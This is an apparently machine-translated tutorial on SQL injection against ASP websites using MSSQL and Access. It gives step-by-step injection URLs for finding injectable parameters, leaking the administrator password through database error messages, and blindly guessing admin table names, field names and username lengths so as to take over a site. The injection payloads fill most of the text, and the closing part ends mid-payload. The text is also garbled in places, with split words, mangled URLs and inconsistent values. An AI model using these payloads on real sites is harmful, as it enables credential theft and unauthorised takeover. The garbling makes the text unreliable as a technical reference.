Causes of website Scripting Vulnerabilities

With the recovery of the network economy, more and more websites are emerging. With the mining of script vulnerabilities, hackers are becoming increasingly rampant and become increasingly younger and foolish. "You only need to use a tool to hack the site", which is characteristic of Script Vulnerability. The main cause of these vulnerabilities is the quality of programming programmers. When programming asp or php programs, the characters are not strictly filtered and injection vulnerabilities are not understood, or a parameter is missing.

The entry threshold for writing web programs in this industry is not high, and the level and experience of programmers are also uneven. A considerable number of programmers did not judge the legitimacy of user input data when writing code, application security risks. You can submit a piece of database query code and obtain the desired data based on the results returned by the program. This is called SQL Injection, that is, SQL Injection.

A considerable number of programmers did not judge the legitimacy of user input data when writing code, posing a security risk to the application. Let's take an example: Create an iis-Based asp program http: // localhost/test/show. asp on the local machine? ID = 3. After the URL is submitted to the server, the server performs a query similar to Select * from table name where field = "& ID (ID is the parameter submitted by the client, in this example, 3), and then return the query result to the client. If the client intentionally submits such a URL: http: // localhost/test/show. asp? ID = 3 and user> 0. Then, the server runs a query such as Select * from table name where field = 444 and user> 0. Of course, this statement cannot run, the error message is as follows:

· Error Type:

Microsoft ole db Provider for ODBC Drivers (0x80040E07)
A syntax error occurs when [Microsoft] [odbc SQL Server Driver] [SQL Server] converts the nvarchar value 'test' to a column whose data type is int.
/Test/show. asp, row 34th

From this error message, we can obtain the following information: the station uses the MSSQL database, uses ODBC connection, and the connection account name is test. The so-called SQL injection is to use the programmer's lax or non-detection of the legality of user input data to intentionally submit special code from the client to collect information about programs and servers, to obtain the desired information. Generally, the goal of others is to obtain the account and password of the website administrator. For example, if you know that the website administrator account exists in the table login, the Administrator account name is admin and you want to know the admin password. Here, you can submit a URL from the client:
Http: // localhost/test/show. asp? ID = 4 and (Select password fro

M login where user_name = 'admin')> 0. The error message returned is as follows:

· Error Type:

Microsoft ole db Provider for ODBC Drivers (0x80040E07)
A syntax error occurs when [Microsoft] [odbc SQL Server Driver] [SQL Server] converts the varchar value 'admin888' to a column whose data type is int.
/Test/show. asp, row 34th

Now "admin888" is the administrator's password! You can use this account and password to take over your website! Of course, we do not know that the account is in the table login, and we do not know the Administrator name admin, but these cannot be solved. We can write a tool to guess, you can quickly find what you want. The above is the basis for mssql database injection. Let's take a look at the acce database injection basics: first, set the browser to ensure that error information can be returned during manual injection. The procedure is as follows: Right-click the browser icon, select "properties", and select the "advanced" tab in the displayed dialog box, remove the check box before "show friendly HTTP Error information" and click "Apply.

For SQL injection, you must first find the injection point, the injection point judgment method is: usually open a http://wwww.xx like

Xx.com/xxx.asp? Id = xx url followed by a single quotation mark, into a http://ww.xxx.com/xxx.asp? Id = xx'

If an error message appears, it indicates there may be an injection vulnerability, and then enter the http://www.xxx.com/xxx.asp? Id = xx and 1 = 1 if the SQL injection vulnerability exists, you can query the database. 1 = 1 is a constant equation that can be ignored. Therefore, a normal page is returned, which corresponds to asp? Http://wwww.xxxx.com/xxx.asp? Id = xx. At this time, the intruder judges that the site is expected to be injected. If some error messages are returned, some elementary intruders may give up the site. Intruders further submit the following url to the browser: http://www.xxx.com/xxx.asp? Id = xx and 1 = 2, 1 = 2 is a constant inequality. If the site supports database queries, the following information is returned:

Microsoft vbscript compiler error code rate

'800a03f6'

'End' missing'

/Iishelp/common/500-100.asp, row 242

ADODB. Field error '800a0bcd'

If the preceding information is displayed, the SQL injection vulnerability exists. The following is an analysis of the SQL Injection Process:

For example, open http: // hostlocal/test2/list. asp? Id = 17 Add 'HTTP: // hostlocal/test2/list. asp? Id = 17'
Error! Displayed as "database error ". Next, we will perform the following operations:

1. Guess the Administrator account table.
2. Guess the user field name and password field name in the table.
3. Guess the username length and password length.
4. Guess the user and password
5. Go to the Management page.

Guess the Administrator's table:

Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (id) from admin) '// min (id) returns the minimum value of the table ID
The system returns the article proof that there is an admin table. If no document is returned, the admin table does not exist.

Guess the user's field name:
Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (id) from admin where user = 'aaa') returns an error message indicating that the user segment name "user" does not exist.
Come back !~~~ Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (id) from admin where username = 'aaa ')
No error message is returned, and no article is returned. The system prompts that the article cannot be found. It indicates that there are username fields in admin, but the user name is not aaa

Field name of the password:
Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (I

D) from admin where passwd = 'aaa') the returned error message indicates that the password field name is not passwd.

Next: http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select

Min (id) from admin where password = aaa') does not return an error message, nor does it return an article, prompting that the article cannot be found. The password field exists in admin, but the password is not aaa

Length of user field name:

Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (

Id) from admin where len (username)

> 5)

Correct
Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (id) from admin where len (username) <10)
Correct
Username length greater than 5 less than 10
Http: // hostlocal/test2/list. asp? Id = 17 and 1 = (select min (id) from admin where len (username)

= 7 )&